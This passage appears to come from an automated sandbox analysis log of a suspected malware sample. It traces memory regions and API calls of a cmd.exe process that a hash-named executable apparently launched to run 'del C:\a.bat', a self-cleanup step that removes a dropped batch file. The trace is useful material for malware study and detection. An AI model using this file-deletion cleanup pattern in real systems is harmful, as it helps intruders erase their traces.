= "" Region: id = 1240 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1241 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1242 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1243 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1244 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1245 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1246 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1247 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1248 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1249 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1250 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1251 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1252 start_va = 0x400000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1253 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1254 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1256 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1257 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1258 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1259 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1260 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1261 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1262 start_va = 0x7b0000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 1263 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1264 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 123 os_tid = 0x670 [0144.524] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0144.524] __set_app_type (_Type=0x1) [0144.524] __p__fmode () returned 0x74974d6c [0144.524] __p__commode () returned 0x74975b1c [0144.524] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0144.524] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0144.525] GetCurrentThreadId () returned 0x670 [0144.525] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x670) returned 0x78 [0144.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0144.526] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0144.526] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.533] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.534] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0144.534] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.534] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.534] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.534] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.534] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.534] GetConsoleOutputCP () returned 0x1b5 [0144.535] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0144.536] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0144.536] _get_osfhandle (_FileHandle=1) returned 0x158 [0144.536] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0144.536] _get_osfhandle (_FileHandle=1) returned 0x158 [0144.536] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0144.536] _get_osfhandle (_FileHandle=0) returned 0x154 [0144.536] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0144.536] GetEnvironmentStringsW () returned 0x5b7cd8* [0144.536] GetProcessHeap () returned 0x5b0000 [0144.536] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa1a) returned 0x5b8700 [0144.537] FreeEnvironmentStringsA (penv="A") returned 1 [0144.537] GetProcessHeap () returned 0x5b0000 [0144.537] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4) returned 0x5b0588 [0144.537] GetEnvironmentStringsW () returned 0x5b7cd8* [0144.537] GetProcessHeap () returned 0x5b0000 [0144.537] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa1a) returned 0x5b9128 [0144.537] FreeEnvironmentStringsA (penv="A") returned 1 [0144.537] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0144.537] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.537] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.537] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.537] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.537] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.538] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.538] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.538] RegCloseKey (hKey=0x88) returned 0x0 [0144.538] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0144.538] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.538] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.538] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.538] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.538] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.538] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.538] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.538] RegCloseKey (hKey=0x88) returned 0x0 [0144.539] time (in: timer=0x0 | out: timer=0x0) returned 0x623441ff [0144.539] srand (_Seed=0x623441ff) [0144.539] GetCommandLineW () returned="cmd.exe /c \"del C:\\a.bat\"" [0144.539] GetCommandLineW () returned="cmd.exe /c \"del C:\\a.bat\"" [0144.539] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.539] GetProcessHeap () returned 0x5b0000 [0144.539] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x210) returned 0x5b9b50 [0144.539] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5b9b58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0144.539] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0144.539] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0144.539] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.539] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.540] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.540] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.540] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.540] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.540] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.540] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.540] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.540] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.540] GetProcessHeap () returned 0x5b0000 [0144.541] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b8700) returned 1 [0144.541] GetEnvironmentStringsW () returned 0x5b7cd8* [0144.541] GetProcessHeap () returned 0x5b0000 [0144.541] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa32) returned 0x5ba7a8 [0144.541] FreeEnvironmentStringsA (penv="A") returned 1 [0144.541] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0144.541] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.541] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.541] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.541] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.541] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.541] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.541] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.541] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.541] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.542] GetProcessHeap () returned 0x5b0000 [0144.542] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x44) returned 0x5b3f38 [0144.542] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.542] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0144.542] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0144.542] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5b05c8 [0144.543] FindClose (in: hFindFile=0x5b05c8 | out: hFindFile=0x5b05c8) returned 1 [0144.543] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5b05c8 [0144.543] FindClose (in: hFindFile=0x5b05c8 | out: hFindFile=0x5b05c8) returned 1 [0144.543] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0144.543] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5b05c8 [0144.543] FindClose (in: hFindFile=0x5b05c8 | out: hFindFile=0x5b05c8) returned 1 [0144.544] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0144.544] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0144.544] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0144.544] GetProcessHeap () returned 0x5b0000 [0144.544] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5ba7a8) returned 1 [0144.544] GetEnvironmentStringsW () returned 0x5b7cd8* [0144.544] GetProcessHeap () returned 0x5b0000 [0144.544] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa76) returned 0x5b9d68 [0144.545] FreeEnvironmentStringsA (penv="=") returned 1 [0144.545] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.545] GetProcessHeap () returned 0x5b0000 [0144.545] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b3f38) returned 1 [0144.545] GetProcessHeap () returned 0x5b0000 [0144.545] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400e) returned 0x5bbc68 [0144.545] GetProcessHeap () returned 0x5b0000 [0144.545] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2a) returned 0x5b3f38 [0144.546] GetProcessHeap () returned 0x5b0000 [0144.546] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4008) returned 0x5bfc80 [0144.546] GetProcessHeap () returned 0x5b0000 [0144.546] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4008) returned 0x5c3c90 [0144.547] _wcsnicmp (_String1="del ", _String2="cmd ", _MaxCount=0x4) returned 1 [0144.547] GetProcessHeap () returned 0x5b0000 [0144.547] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x418) returned 0x5ba7e8 [0144.548] SetErrorMode (uMode=0x0) returned 0x8003 [0144.548] SetErrorMode (uMode=0x1) returned 0x0 [0144.548] GetFullPathNameW (in: lpFileName="del C:\\.", nBufferLength=0x208, lpBuffer=0x5ba7f0, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\del C:", lpFilePart=0x19fbac*="del C:") returned 0x24 [0144.548] SetErrorMode (uMode=0x8003) returned 0x1 [0144.548] GetProcessHeap () returned 0x5b0000 [0144.548] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5ba7e8, Size=0x5e) returned 0x5ba7e8 [0144.548] GetProcessHeap () returned 0x5b0000 [0144.548] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5ba7e8) returned 0x5e [0144.548] NeedCurrentDirectoryForExePathW (ExeName="del C:\\.") returned 1 [0144.548] GetProcessHeap () returned 0x5b0000 [0144.548] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x58) returned 0x5ba850 [0144.548] GetProcessHeap () returned 0x5b0000 [0144.548] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa4) returned 0x5ba8b0 [0144.548] GetProcessHeap () returned 0x5b0000 [0144.549] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5ba8b0, Size=0x58) returned 0x5ba8b0 [0144.549] GetProcessHeap () returned 0x5b0000 [0144.549] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5ba8b0) returned 0x58 [0144.549] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0144.549] GetProcessHeap () returned 0x5b0000 [0144.549] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe0) returned 0x5ba910 [0144.553] GetProcessHeap () returned 0x5b0000 [0144.553] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5ba910, Size=0x76) returned 0x5ba910 [0144.553] GetProcessHeap () returned 0x5b0000 [0144.553] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5ba910) returned 0x76 [0144.553] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.554] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\del C:\\a.bat", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0144.554] GetLastError () returned 0x7b [0144.554] GetProcessHeap () returned 0x5b0000 [0144.555] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bfc80) returned 1 [0144.555] GetProcessHeap () returned 0x5b0000 [0144.556] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5c3c90) returned 1 [0144.556] GetProcessHeap () returned 0x5b0000 [0144.556] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbc68) returned 1 [0144.557] GetConsoleOutputCP () returned 0x1b5 [0144.559] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0144.559] GetUserDefaultLCID () returned 0x409 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0144.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0144.561] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0144.561] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0144.561] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0144.561] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.562] GetProcessHeap () returned 0x5b0000 [0144.562] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20c) returned 0x5ba9d8 [0144.563] GetConsoleTitleW (in: lpConsoleTitle=0x5ba9d8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0144.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0144.566] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0144.567] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0144.567] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0144.567] GetProcessHeap () returned 0x5b0000 [0144.567] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400a) returned 0x5bbc68 [0144.567] GetProcessHeap () returned 0x5b0000 [0144.568] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbc68) returned 1 [0144.568] _wcsicmp (_String1="del", _String2=")") returned 59 [0144.568] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0144.568] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0144.568] _wcsicmp (_String1="IF", _String2="del") returned 5 [0144.568] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0144.568] _wcsicmp (_String1="REM", _String2="del") returned 14 [0144.568] _wcsicmp (_String1="REM/?", _String2="del") 